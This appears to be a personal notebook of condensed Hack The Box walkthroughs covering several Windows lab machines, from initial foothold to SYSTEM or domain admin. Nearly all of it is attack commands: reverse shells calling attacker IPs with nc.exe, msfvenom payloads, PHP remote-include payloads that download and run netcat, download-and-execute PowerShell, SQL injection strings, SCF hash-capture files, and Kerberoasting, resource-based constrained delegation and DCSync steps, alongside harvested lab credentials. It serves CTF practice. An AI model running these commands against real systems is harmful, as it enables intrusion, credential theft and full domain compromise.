run it will enter a linux container,and the '.bash_history' is not empty
root@SECNOTES:~# cat .bash_history
found 'smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$'
`winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe` OR `psexec.py administrator@10.10.10.97`

Initial_Foothold
ftp anonymous found /Users/Nadine/Confidential.txt which has hint: user 'Nathan' has place 'Passwords.txt' at Desktop of user 'Nadine'
tcp80 redirect to /Pages/login.htm, which looks like a login form of NVMS-1000
`searchsploit "nvms 1000"` found 'NVMS 1000 - Directory Traversal' https://www.exploit-db.com/exploits/47774
GET /../../../../../../../../../../../../windows/win.ini test good
GET /../../../../../../../../../../../../users/nathan/desktop/passwords.txt save in a file, also the 2 users we know
`crackmapexec smb 10.10.10.184 -u users -p passwords` found cred nadine:L1k3B1gBut7s@W0rk
`ssh nadine@10.10.10.184` with L1k3B1gBut7s@W0rk
Privilege_escalation(nadine–>SYSTEM)
NSClient++ 0.5.2.35 - Privilege Escalation https://www.exploit-db.com/exploits/46802
find NSClient++ password ew2x6SsGTxjRwXOT by c:\Program Files\NSClient++>type nsclient.ini OR C:\Program Files\NSClient++>nscp web -- password --display
but we can't login tcp8443 with it, because 'allowed hosts = 127.0.0.1' in nsclient.ini
`ssh nadine@10.10.10.184 -L 8443:127.0.0.1:8443` now we can login https://127.0.0.1:8443/
Settings>>external_scripts>>scripts setup payload based on 'info' example, scheduler>>schedules setup schedule (Changes>>Save_configuration)
OR do it in cli
nadine@SERVMON c:\temp>curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.19 443 -e cmd.exe"
nadine@SERVMON c:\temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=1m
OR trigger it by restart the service
PS> Get-Service nscp | fl *
found 'CanStop : True'
`sc.exe stop nscp` `sc.exe start nscp`

Initial_Foothold
nmap found '1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)'
ODAT (Oracle Database Attacking Tool) https://github.com/quentinhardy/odat
`./odat-libc2.17-x86_64 --help`
`./odat-libc2.17-x86_64 all -s 10.10.10.82 -p 1521` and C 'continue without asking' found cred scott/tiger
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.19 lport=9001 -f exe -o ../9001.exe`
`./odat-libc2.17-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 9001.exe ../9001.exe`
`./odat-libc2.17-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 9001.exe`
the listener got system shell
OR more detail steps by 0xdf: https://0xdf.gitlab.io/2018/08/04/htb-silo.html#oracle-db---port-1521

Initial_Foothold
`smbmap -H 10.10.10.103 -u anonymous -R`
if we upload some file to /Users/Public it will get deleted timely
upload a .scf(Windows Explorer Shell Command files) file so that when user open the share we can get hash
=====0xdf.scf=====
[Shell]
Command=2
IconFile=\\10.10.14.4\icon
=====ippsec.scf=====
[Shell]
Command=2
IconFile=\\10.10.14.3\share\pwn.ico
[Taskbar]
Command=ToggleDesktop
`responder -I tun0` got hash, crack got cred amanda:Ashare1972
`mount -t cifs -o username=amanda,password=Ashare1972 "//10.10.10.103/CertEnroll" /mnt` found cert files, save for later
`ldapdomaindump -u 'htb.local\amanda' -p Ashare1972 10.10.10.103 -o ./ldap/` analize user and group
gobuster dir with /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt found //certenroll/ and //certsrv/
get the CSR(Certificate Signing Request)
I use `openssl req -newkey rsa:2048 -nodes -keyout amanda.key -out amanda.csr` (Not sure where I got this)
ippsec use `openssl genrsa -des3 -out amanda.key 2048` `openssl req -new -key amanda.key -out amanda.csr`
login /certsrv/ with amanda:Ashare1972 then click request_a_certificate>>advanced_certificate_request, paste the amanda.csr content and submit, download base64 format
0xdf shows another way, which is install the cert and backup(download) then use openssl export the cert and key
login /certsrv/ with amanda:Ashare1972 then click request_a_certificate>>user_certificate>>install_this_certificate and backup/download this cert got amanda.p12 file
`openssl pkcs12 -in amanda.p12 -nocerts -out amanda.key` `openssl pkcs12 -in amanda.p12 -clcerts -nokeys -out amanda.crt`
Both way end up with 2 files: .crt .key
`wget https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb`
edit [endpoint: 'https://10.10.10.103:5986/wsman',] and change [user: 'username', password: 'password',] to [client_cert: 'amanda.crt', client_key: 'amanda.key', key_pass: '',]
`ruby winrm_shell_amanda.rb` I got error and `gem install httpclient`
Privilege_escalation(break_out_ConstrainedLanguage_mode)
PS htb\amanda@SIZZLE Documents> $executioncontext.sessionstate.languagemode
ConstrainedLanguage
Bypass for PowerShell Constrained Language Mode https://github.com/padovah4ck/PSByPassCLM
compile in VS or just use the one in /PSByPassCLM/bin/x64/Debug and upload to target
PS htb\mrlky@SIZZLE temp> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U /revshell=true /rhost=10.10.14.3 /rport=443 \windows\temp\PsBypassCLM.exe
and listen new shell `$executioncontext.sessionstate.languagemode` output: FullLanguage
Privilege_escalation(amanda–>mrlky)
Rubeus is a C# toolset for raw Kerberos interaction and abuses https://github.com/GhostPack/Rubeus
upload as r.exe `.\r.exe kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972`
OR
root@kali# /opt/chisel/chisel server -p 8008 --reverse
PS C:\windows\temp> .\c.exe client 10.10.14.4:8008 R:88:127.0.0.1:88 R:389:localhost:389
root@kali# GetUserSPNs.py -request -dc-ip 127.0.0.1 htb.local/amanda -save -outputfile GetUserSPNs.out
both got mrlky hash `hashcat GetUserSPNs.out --wordlist /usr/share/wordlists/rockyou.txt` get cred mrlky:Football#7
`openssl req -newkey rsa:2048 -nodes -keyout mrlky.key -out mrlky.csr`
do the same crt steps for mrlky with mrlky.csr and edit then launch `ruby winrm_shell_mrlky.rb`
do the same break_out_ConstrainedLanguage_mode for mrlky shell and enum
Privilege_escalation(mrlky->administrator)
`iex(new-object net.webclient).downloadstring('http://10.10.14.3/SharpHound.ps1')`
`. .\SharpHound.ps1`
`invoke-bloodhound -collectionmethod all -outputDirectory C:\users\mrlky\`
download and analize by booldhound found user 'mrlky' has 'DCSync' 'GetChangesAll' 'GetChanges' over 'HTB.LOCAL' domain
`secretsdump.py -just-dc mrlky:Football#7@10.10.10.103` found administrator NT hash
`wmiexec.py -hashes :f6b7160bfc91823792e0ac3a162c9267 administrator@10.10.10.103`
short_cuts 1(found hashes in file.txt)
found hashes in C:\windows\system32\file.txt
PS htb\amanda@SIZZLE system32> type file.txt
root@kali# secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:bceef4f6fe9c026d1d8dec8dce48adef -just-dc HTB.LOCAL/mrlky@10.10.10.103
short_cuts 2(found writable clean.bat)
original_content: forfiles -p "C:\Department Shares\Users\Public" -s -m *.* /C "cmd /c del @path"
PS htb\amanda@SIZZLE documents> icacls clean.bat
HTB\amanda:(I)(F)
PS htb\amanda@SIZZLE documents> echo "" | out-file -encoding ASCII -append clean.bat
PS htb\amanda@SIZZLE documents> echo '\windows\system32\spool\drivers\color\n.exe -e cmd.exe 10.10.14.4 443' | out-file -encoding ASCII -append test.bat
listener will get administrator shell

Initial_Foothold
https://watch.streamio.htb/Search.php manual SQL injection(WAF block '0x' and 'ORDER BY')
portswigger SQLI cheatsheet: https://portswigger.net/web-security/sql-injection/cheat-sheet#database-version
[';– -] [df' union select 1,2,3,4,5,6;-- -] [df' union select 1,@@version,3,4,5,6;-- -] MSSQL 2019 15.0.2000.5x64
MSSQL cheatsheet: https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Non-crackable: `responder -I tun0` [df'; use master; exec xp_dirtree '\\10.10.14.6\share';-- -] got a machine account hash
list all dbs: [df' union select 1,name,DB_NAME(),4,5,6 from master..sysdatabases;-- -] master,model,msdb,STREAMIO,streamio_backup,tempdb
list current db: [df' union select 1,(select DB_NAME()),3,4,5,6;-- -] output: STEAMIO
list STEAMIO tables: [ippsec' union select 1,(SELECT STRING_AGG(name,',') name FROM STEAMIO..sysobjects WHERE xtype = 'U'),3,4,5,6;-- -]
list STEAMIO.users columns: [ippsec' UNION SELECT 1,name,3,4,5,6 FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users');-- -]
display contents: [ippsec' union select 1,CONCAT(username, ' ', password),3,4,5,6 FROM users-- -] save usernames and hashes and crack
Failed(none_works): `crackmapexec smb 10.10.11.158 -u user -p pass --no-bruteforce --continue-on-success`
`hydra -L users.txt -P passwords.txt streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"` got cred yoshihide:66boysandgirls..
after login in yoshihide, we can access /admin and found each of the button leads to a parm. like 'User management' leads to https://streamio.htb/admin/?user=
`wfuzz -u https://streamio.htb/admin/?FUZZ= -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -H "Cookie: PHPSESSID=jtde06u71uq4t7pvs59b8iis1o" --hh 1678` found https://streamio.htb/admin/?debug=
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php and `base64 -d` we found: "Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890'
feroxbuster found /admin/master.php which has hint: "Only accessable through includes"
https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php and `base64 -d` we found: eval(file_get_contents($_POST['include']))
In burp, we can use POST parm 'include' to get code execution, such as "include=http://10.10.14.19/payload.php"
0xdf payload.php: system("powershell -c wget 10.10.14.6/nc64.exe -outfile \\programdata\\nc64.exe"); system("\\programdata\\nc64.exe -e powershell 10.10.14.6 443");
ippsec payload.php: system("curl 10.10.14.23/nc64.exe -o c:\\windows\\temp\\nc64.exe"); system("c:\\windows\\temp\\nc64.exe 10.10.14.23 4444 -e cmd.exe");
I use 0xdf payload with: `curl --silent -X POST -k "https://streamio.htb/admin/?debug=master.php" --data-urlencode "include=http://10.10.14.19/payload.php" --cookie "PHPSESSID=hqgmr9p1o14he1fl6vubv8ouq7"`
listener got yoshihide shell
Privilege_escalation(yoshihide->nikk37)
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
besides the index.php we have exfiled, login.php and register.php also have db_admin:B1@hx31234567890
PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select table_name from streamio_backup.information_schema.tables;" only 2 tabls: movies,users
PS C:\> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "select * from users;"
save usernames and hashes, crack `crackmapexec smb 10.10.11.158 -u user -p pass --continue-on-success --no-bruteforce` got cred nikk37:get_dem_girls2@yahoo.com
winrm also works `crackmapexec winrm 10.10.11.158 -u nikk37 -p 'get_dem_girls2@yahoo.com'`
`evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i 10.10.11.158`
Privilege_escalation(nikk37->JDgodd)
winpeas.exe found firefox cred file at C:\Users\nikk37\AppData\roaming\mozilla\Firefox\Profiles\br53rxeg.default-release\
https://github.com/lclevy/firepwd transfer key4.db and logins.json from target to a folder on kali
`python3 ./firepwd-master/firepwd.py -d ./firefoxprofile` save usernames and passwords
`crackmapexec smb 10.10.11.158 -u ./firefoxprofile/users.txt -p ./firefoxprofile/passwords.txt --continue-on-success` get cred JDgodd:JDg0dd1s@d0p3cr3@t0r
winrm don't work, but we can enum further with 'JDgodd'
Privilege_escalation(JDgodd->administrator)
Failed(can't connect dc.streamio.htb): `bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb --zip`
after add 'dc.streamio.htb' to /etc/hosts and `ntpdate -s 10.10.11.158`
`bloodhound-python -c All -u jdgodd -p 'JDg0dd1s@d0p3cr3@t0r' -ns 10.10.11.158 -d streamio.htb -dc streamio.htb --zip`
in bloodhound, user 'jdgodd' has 'WriteOwner' over 'CORE STAFF' group which has 'ReadLAPSPassword' over 'DC.STREAMIO.HTB' computer
*Evil-WinRM* PS C:\programdata> upload PowerView.ps1
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
Add user 'JDgodd' to 'CORE STAFF' group
0xdf: $pass = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
0xdf: $cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $pass)
0xdf: Add-DomainObjectAcl -Credential $cred -TargetIdentity "Core Staff" -PrincipalIdentity "streamio\JDgodd"
0xdf: Add-DomainGroupMember -Credential $cred -Identity "Core Staff" -Members "StreamIO\JDgodd"
0xdf: net user jdgodd
ippsec: $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
ippsec: $Cred = New-Object System.Management.Automation.PSCredential('streamio.htb\JDgodd', $SecPassword)
ippsec: Set-DomainObjectOwner -Identity 'CORE STAFF' -OwnerIdentity JDgodd -Cred $Cred
ippsec: Add-DomainObjectAcl -TargetIdentity "CORE STAFF" -PrincipalIdentity JDgodd -Cred $cred -Rights All
ippsec: Add-DomainGroupMember -Identity 'CORE STAFF' -Members 'JDgodd' -Cred $cred
ippsec: net group 'CORE STAFF'
method_1 'ReadLAPSPassword' by property on the computer object
*Evil-WinRM* PS C:\programdata> Get-AdComputer -Filter * -Properties ms-Mcs-AdmPwd -Credential $cred
ms-Mcs-AdmPwd : -Z4I/T1W0%+4nF
method_2 'ReadLAPSPassword' by ldapsearch
`ldapsearch -h 10.10.11.158 -b 'DC=streamIO,DC=htb' -x -D JDgodd@streamio.htb -w 'JDg0dd1s@d0p3cr3@t0r' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd`
ms-Mcs-AdmPwd: -Z4I/T1W0%+4nF
method_3 'ReadLAPSPassword' by crackmapexec
`crackmapexec smb 10.10.11.158 -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' --laps --ntds`
SMB 10.10.11.158 445 DC [-] DC\administrator:-Z4I/T1W0%+4nF STATUS_LOGON_FAILURE
`evil-winrm -u administrator -p '-Z4I/T1W0%+4nF' -i 10.10.11.158`

Initial_Foothold
`smbmap -H 10.10.11.174 -u anonymous -R` found .\support-tools\UserInfo.exe.zip
Failed(no perm): `smbget -U anonymous smb://10.10.11.174/support-tools/UserInfo.exe.zip`
`smbclient //10.10.11.174/support-tools` smb: \> get UserInfo.exe.zip
`mkdir UserInfo; unzip UserInfo.exe.zip -d UserInfo`
Failed(both not work) `pwsh` OR `wine UserInfo.exe -v find -first '*'`
transfer to commando(windows VM) edit C:\Windows\System32\drivers\etc\hosts 'support.htb'
PS > .\UserInfo.exe find -first '*'
wireshark capture cred ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
Nothing_interesting: `bloodhound-python -c ALL --zip -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174`
`ldapsearch -x -H ldap://10.10.11.174 -D ldap@support.htb -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > ldapsearch_ldap.txt`
found suspectpass 'Ironside47pleasure40Watchful' under 'support' user object
`crackmapexec winrm support.htb -u support -p 'Ironside47pleasure40Watchful'` test good
`evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'`
Privilege_escalation(support->domain_admin)
user 'support' is in 'Shared Support Accounts' group, which has 'GenericAll' over 'DC.SUPPORT.HTB' computer object
based on bloodhound GenericAll abuse_info: Full control of a computer object can be used to perform 'resource-based constrained delegation' attack
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
https://github.com/Kevin-Robertson/Powermad
https://github.com/GhostPack/Rubeus
just use the pre-compiled rubeus.exe upload to target
*****[Resource Based Constrained Delegation] ippsec:
we can add a computer($FAKE-COMP01) under our control to the domain and configure the Domain Controller to allow $FAKE-COMP01 to act on behalf of it.
Then, by acting on behalf of the DC we can request Kerberos tickets for $FAKE-COMP01 , with the ability to impersonate a highly privileged user on the Domain, such as the Administrator .
After the Kerberos tickets are generated, we can Pass the Ticket (PtT) and authenticate as this privileged user, giving us control over the entire domain.
`Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota` check if value greater than 0
`upload PowerView.ps1` `. ./PowerView.ps1`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is empty
`upload Powermad.ps1` `. ./Powermad.ps1`
=====Creating a Computer Object=====
`New-MachineAccount -MachineAccount FAKE-COMP01 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)`
`Get-ADComputer -identity FAKE-COMP01` check if it's created and SID assigned
=====Configuring RBCD(Resource-Based Constrained Delegation)=====
method_1 We can either set the PrincipalsAllowedToDelegateToAccount value to FAKE-COMP01 through the builtin PowerShell Active Directory module, which will in turn configure the msds-allowedtoactonbehalfofotheridentity attribute on its own.
method_2 we can use the PowerView module to directly set the msds-allowedtoactonbehalfofotheridentity attribute.
ippsec only show method_1
`Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP01$`
`Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount`
`Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity` check if value is not empty
this attribute is 'Raw Security Descriptor' we will have to convert the bytes to a string to verify the SID of FAKE-COMP01$
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check the SecurityIdentifier with FAKE-COMP01$ and AceType: AccessAllowed
=====Performing a S4U Attack=====
'Service for User' attack, also known as 'Kerberos unconstrained delegation abuse'
`.\rubeus.exe hash /password:Password123 /user:FAKE-COMP01$ /domain:support.htb` copy the value of 'rc4_hmac' then generate ticket for administrator
`.\rubeus.exe s4u /user:FAKE-COMP01$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt`
save the 'Administrator' user's base64 tricket string as ticket.kirbi.b64 on kali
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass`
*****[Resource Based Constrained Delegation] 0xdf:
First I’ll add a fake computer to the domain under my control.
Then I can act as the DC to request Kerberos tickets for the fake computer giving the ability to impersonate other accounts(Administrator).
For this to work, I’ll need an authenticated user who can add machines to the domain (by default, any user can add up to 10).
This is configured in the ms-ds-machineaccountquota attribute, which needs to be larger than 0.
Finally, I need write privileges over a domain joined computer (which GenericALL on the DC gets me.)
upload the 3 tools, and load 2, `. ./PowerView.ps1` `. ./Powermad.ps1`
`Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota` check if value greater than 0
`Get-DomainController | select name,osversion | fl` check if OSVersion is 2012 later (2022)
`Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl` check if value is empty
=====Create FakeComputer=====
`New-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString '0xdf0xdf123' -AsPlainText -Force)`
`$fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid`
`$fakesid` check it's assigned
=====configure the DC to trust my fake computer to make authorization decisions on it’s behalf
`$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"`
`$SDBytes = New-Object byte[] ($SD.BinaryLength)`
`$SD.GetBinaryForm($SDBytes, 0)`
`Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}`
`$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity`
`$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0`
`$Descriptor.DiscretionaryAcl` check the SecurityIdentifier with FAKE-COMP01$ and AceType: AccessAllowed
If rerun bloodhound, we can see '0xdfFakeComputer.support.htb' computer_object now has 'AllowToAct' over 'dc.support.htb' computer_object
=====Auth as Fake Computer=====
`.\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb` copy 'rc4_hmac' value
=====get ticket=====
`.\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt`
`.\Rubeus.exe klist`
=====use ticket on kali=====
`base64 -d ticket.kirbi.b64 > ticket.kirbi`
`ticketConverter.py ticket.kirbi ticket.ccache`
`KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass`

Initial_Foothold
`crackmapexec smb dc01.timelapse.htb --shares -u 0xdf -p ''`
`smbclient -N //dc01.timelapse.htb/Shares` smb: \dev\> get winrm_backup.zip
`zip2john winrm_backup.zip > winrm_backup.zip.hash`
`john --wordlist=/usr/share/wordlists/rockyou.txt winrm_backup.zip.hash` password: supremelegacy
`unzip -P supremelegacy winrm_backup.zip` got file: legacyy_dev_auth.pfx
https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
`pfx2john.py legacyy_dev_auth.pfx | tee legacyy_dev_auth.pfx.hash` tee will save the output and display it at same time
`john --wordlist=/usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx.hash` password: thuglegacy (this will be the 'import password')
`openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc` PEM_pass need to be at least 4 chars
`openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key` decrypt it so that we never have to remember the PEM_pass
`openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt`
`evil-winrm -i timelapse.htb -S -k legacyy_dev_auth.key -c legacyy_dev_auth.crt` -S 'Enable SSL to connecting 5986'
Privilege_escalation(legacyy->svc_deploy)
winpeas.exe found cred svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV in C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
`evil-winrm -i timelapse.htb -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S`
'svc_deploy' user is in '*LAPS_Readers' group. LAPS=Local Administrator Password Solution
google found me https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/ous/laps/ But I've never try: `Get-AdmPwdPassword –ComputerName dc01`
0xdf use: `Get-ADComputer DC01 -property 'ms-mcs-admpwd'` got ms-mcs-admpwd: uM[3va(s870g6Y]9i]6tMu{j
ippsec use: https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS
`upload AdmPwd.PS`
`Find-AdmPwdExtendedRights -identity *` check what objects can manage the LAPS
`Find-AdmPwdExtendedRights -identity 'Domain Controllers' | select-object ExtendedRightHolders` output only 3 group: SYSTEM,Domain_Admins,LAPS_Readers
`get-admpwdpassword -computername dc01 | Select password` got password: /1B@QZe3{BAAwzs%KY$pTb7d
`evil-winrm -i 10.10.11.152 -u administrator -p '/1B@QZe3{BAAwzs%KY$pTb7d' -S`

Initial_Foothold
nmap found 3690/tcp open svnserve Subversion
Failed(link_expired): http://www.gcf.dkf.unibe.ch/BCB/files/BCB_Subversion_Cheat_Sheet.pdf
https://www.cheat-sheets.org/saved-copy/subversion-cheat-sheet-v1.pdf
`svn checkout svn://10.10.10.203` this will copy the repo to local
`svn log` shows there were 5 commits, enum them one by one -r 1 .. -r 5
`svn update -r 2` found 'deploy.ps1' was 'A' added, found cred nathen:wendel98
`svn update -r 5` found 'moved.txt' was 'A' added, found http://devops.worker.htb
`wfuzz -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.10.203 -H 'Host: FUZZ.worker.htb' --hh 703` found other subdomain
/etc/hosts 10.10.10.203 worker.htb alpha.worker.htb story.worker.htb devops.worker.htb cartoon.worker.htb lens.worker.htb dimension.worker.htb twenty.worker.htb solid-state.worker.htb spectral.worker.htb
login devops.worker.htb as nathen:wendel98 >>SmartHotel360>>pick a site(e.g. Alpha-CI), in Tasks tab we found [TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb']
Note: pipeline is a series of commands to run, presumably to build the updated site and deploy it. we can create pipeline and build but we can not push it to master branch
but we can clone(create based on) master repo, upload cmd.aspx and delpoy(queue build for Alpha-CI in pipeline). then we got webshell at alpha.worker.htb/cmd.aspx
Privilege_escalation(iis–>robisl)
`wmic logicaldisk get deviceid, volumename, description` and `powershell -c get-psdrive -psprovider filesystem` both shown there is a w: drive working
found lone list of user and pass in W:\svnrepos\www\conf\passwd
0xdf: `net localgroup "Remote Management Users"` found user 'robisl'
ippsec: `crackmapexec winrm 10.10.10.203 -u users -p passwords --no-bruteforce` found robisl:wolves11
`evil-winrm -i 10.10.10.203 -u robisl -p wolves11`
Privilege_escalation(robisl->system)
login devops.worker.htb as robisl:wolves11
>>PartsUnlimited>>Project_Settings>Security>>Build_Administrators(group)>> found robisl, which has full control over pipelines in the project. we can create new build to run arbitrary commands
>>PartsUnlimited>>Project_Settings>Agent_pools>>Setup>>Agents>>Hamilton11>>Capabilities found USERNAME:WORKER$ which means the build will be ran by SYSTEM
0xdf:
create new pipeline>>Azure_Repos_Git>>PartsUnlimited>>starter_pipeline>>default yaml>>create_new_branch...(we can't commit to master branch)>>save&run failed(there is no pool name called 'Default')
found 'Setup' in Collection_Settings>>agent_pool, edit the yaml, inject payload under 'script:'
0xdf_payload: - script: c:\programdata\nc.exe -e cmd 10.10.14.24 443
listener get SYSTEM shell
ippsec:
create new pipeline>>Use_the_classic_editor>>continue(default)>>empty_pipeline>>choose 'Setup' in agent_pool>>add job 'Powershell'
ippsec_payload: net user cube Password123! /add ; net localgroup administrators cube /add
`evil-winrm -i 10.10.10.203 -u cube -p Password123!` got administrator shell
short_cut(iis–>system)
iis user `whoami /priv` has 'SeImpersonatePrivilege Enabled'
c:\ProgramData>powershell -c wget http://10.10.14.24/RoguePotato.exe -outfile RoguePotato.exe
https://github.com/antonioCoco/RoguePotato?tab=readme-ov-file
Normal steps: kali@root# socat tcp-listen:135,reuseaddr,fork tcp:10.10.10.203:9999
Normal steps: c:\ProgramData> echo c:\programdata\nc.exe -e cmd 10.10.14.24 443 > .\rev.bat
Normal steps: c:\ProgramData> .\RoguePotato.exe -r 10.10.14.24 -l 9999 -e C:\programdata\rev.bat
Fail_cause_1: Windows Defender will detect and delete RoguePotato.exe
Fail_cause_2: Target Firewall block any inbound connection except 80/tcp http, 3690/tcp svn, 5985/tcp wsman
0xdf solution:
countermeasure_1: download and run with a oneliner
countermeasure_2: use chisel forward kali:9999 to target:9999, which bypass the firewall
root@kali# ./chisel_1.6.0_linux_amd64 server -p 8000 --reverse
c:\ProgramData>.\chisel.exe client 10.10.14.24:8000 R:9999:localhost:9999
root@kali# socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999
c:\ProgramData>powershell -c wget 10.10.14.24/RoguePotato.exe -outfile r.exe; .\r.exe -r 10.10.14.24 -l 9999 -e C:\programdata\rev.bat
listener got SYSTEM shell
ALL Potatoes: https://jlajara.gitlab.io/Potatoes_Windows_Privesc